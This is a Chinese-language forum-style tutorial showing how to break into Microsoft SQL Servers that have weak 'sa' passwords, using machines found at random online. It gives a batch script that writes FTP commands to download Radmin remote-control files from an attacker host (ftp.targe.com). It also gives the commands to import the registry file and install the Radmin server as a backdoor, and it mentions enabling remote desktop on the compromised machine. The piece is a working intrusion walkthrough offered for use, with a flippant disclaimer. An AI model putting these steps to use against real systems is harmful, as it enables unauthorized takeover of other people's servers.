SA弱口令结合FTP的入侵实例

闲着无聊，就在网上随便找了一段，最近一直想利用SQl做点什么，所以就先从他弱口令开始吧。呵呵！～～
    这样的机子在网上要多少有多少，扫描工具更是举不胜举，我在此不做过多的详述，今天我们是要利用这些漏洞上传木马，获取系统权限才是目的。
    好了，拿出久味开启的SQlexec数据库连接工具，复制了一个IP上去，先试试能不能连。呵呵！
     

不错，我们成功的看到了他C盘下的动动。今天的运气真的是太好了，高兴的。。。。原地走两圈吧！
我接着键入net start命令，服务一切正常，所以想走捷径是不可能了。不打紧，我们给他下个木装上不就得了。呵呵，说做就做，先写一个FTP的脚本吧，这样方便这鸡一下子把所有的东东下完。

我做的FTP.txt脚本如下：
     @echo off
     @echo open ftp.targe.com port>ftp.txt
     @echo username>>ftp.txt
     @echo password>>ftp.txt
     @echo get radmin.reg>>ftp.txt
     @echo binary>>ftp.txt
     @echo get admdll.dll>>ftp.txt
     @echo get r_server.exe>>ftp.txt
     @echo bye>>ftp.txt
     @echo on
     ftp.targe.com是你的ftp的地址，username和password是。。。。不用说了吧！
port是端口号。当然，如果你需要看执行结果的话，可以把@echo off和@echo on这两行取掉，也方便录入。呵呵～～
     接着在命令行里面键入： ftp -s:ftp.txt一切顺利的话，过不了多长时间，都会把这三个文件下下来。
      呵呵，伟大的时间就要到来了！
      当文件下载一切成功之后，我们就可以启动它了。 命令如下：
     regedit /s radmin.reg
     r_server /install
等等，在SQlexec里面执行到这的时候往往Sqlexec回死掉，如果死掉的话，那么我们再接着连接，接着键入
     net start
     你会在屏募上看到熟悉的字符，哈哈哈。"successful!"
     我想到了， 这里就不用我说了吧，如果你进的是一台Server的机子，那开3389就看个人爱好了。不过如果入侵了一台WEB的服务器，最好不要乱来哦。不然网管会哭的，我这里只是介绍方法，一切后果可是与我没有半点关系的。
      就到这里吧，写的太乱了，如果大家有什么问题可以向我提问！

源代码网整理以下